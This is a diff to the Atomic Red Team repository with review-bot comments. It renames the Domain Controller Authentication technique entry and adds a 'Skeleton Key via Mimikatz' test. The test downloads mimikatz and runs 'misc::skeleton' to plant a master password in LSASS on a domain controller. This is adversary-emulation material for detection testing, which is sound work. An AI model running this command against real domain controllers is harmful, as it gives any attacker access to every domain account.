| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -176,7 +176,7 @@
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+3 -3
@@ -46,7 +46,7 @@
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
@@ -76,7 +76,7 @@
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | SVG Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
@@ -135,7 +135,7 @@
| | | | | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+6 -3
@@ -11566,7 +11566,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11596,6 +11596,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
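Review bot: `identifier: T1556.001` is inserted between `x_mitre_version` and `atomic_tests`, and `atomic_tests` is left as `[]`; that is only correct if this file is an index for a platform other than Windows, because the Skeleton Key test added in the full index hunk later in this commit lists `supported_platforms: [windows]` only. Please confirm the other technique entries in this file already carry `identifier` at the same position, so consumers of the YAML do not encounter a one-off key order for this technique; the same shape is repeated in the persistence and credential-access hunks of this file, so a generator-side fix would cover all three.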
@@ -33296,7 +33297,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -33326,6 +33327,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -45659,7 +45661,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45689,6 +45691,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11541,7 +11541,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11571,6 +11571,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32733,7 +32734,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32763,6 +32764,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44936,7 +44938,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44966,6 +44968,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32017,7 +32018,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32048,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44146,7 +44148,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44178,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32133,7 +32134,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32163,6 +32164,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44320,7 +44322,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44350,6 +44352,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11470,7 +11470,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11500,6 +11500,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32017,7 +32018,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32047,6 +32048,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44146,7 +44148,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44176,6 +44178,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11895,7 +11895,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11925,6 +11925,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32803,7 +32804,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32833,6 +32834,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -45064,7 +45066,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45094,6 +45096,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11550,7 +11550,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11580,6 +11580,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32637,7 +32638,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32667,6 +32668,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -45231,7 +45233,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -45261,6 +45263,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+6 -3
@@ -11511,7 +11511,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -11541,6 +11541,7 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1027.006:
technique:
@@ -32495,7 +32496,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -32525,6 +32526,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
@@ -44741,7 +44743,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -44771,6 +44773,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests: []
T1556.005:
technique:
+147 -6
@@ -27965,7 +27965,7 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -27995,7 +27995,54 @@ defense-evasion:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
T1027.006:
technique:
type: attack-pattern
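Review bot: the dependency description added in this hunk is cut off mid-sentence (`- description: Mimikatz must be present on the host machine at`); complete it with the input it refers to, e.g. `Mimikatz must be present on the host machine at #{mimikatz_path}`, because this string is what the generated docs and the runner show when the prereq check fails. Two smaller points on the same test: the description says it must only run on an isolated domain controller, yet `prereq_command` only tests that the binary exists, so consider also failing the prereq when the host is not a DC (e.g. `if ((Get-CimInstance Win32_ComputerSystem).DomainRole -lt 4) {exit 1}`) as a guard against an accidental run on a production DC; and `Restart-Computer -Force` in `cleanup_command` terminates the runner session before it can record cleanup status, which is worth stating explicitly for framework users.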
@@ -73171,7 +73218,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -73201,7 +73248,54 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
T1556.005:
technique:
type: attack-pattern
@@ -98485,7 +98579,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
name: 'Modify Authentication Process: Domain Controller Authentication'
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
@@ -98515,7 +98609,54 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
atomic_tests: []
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
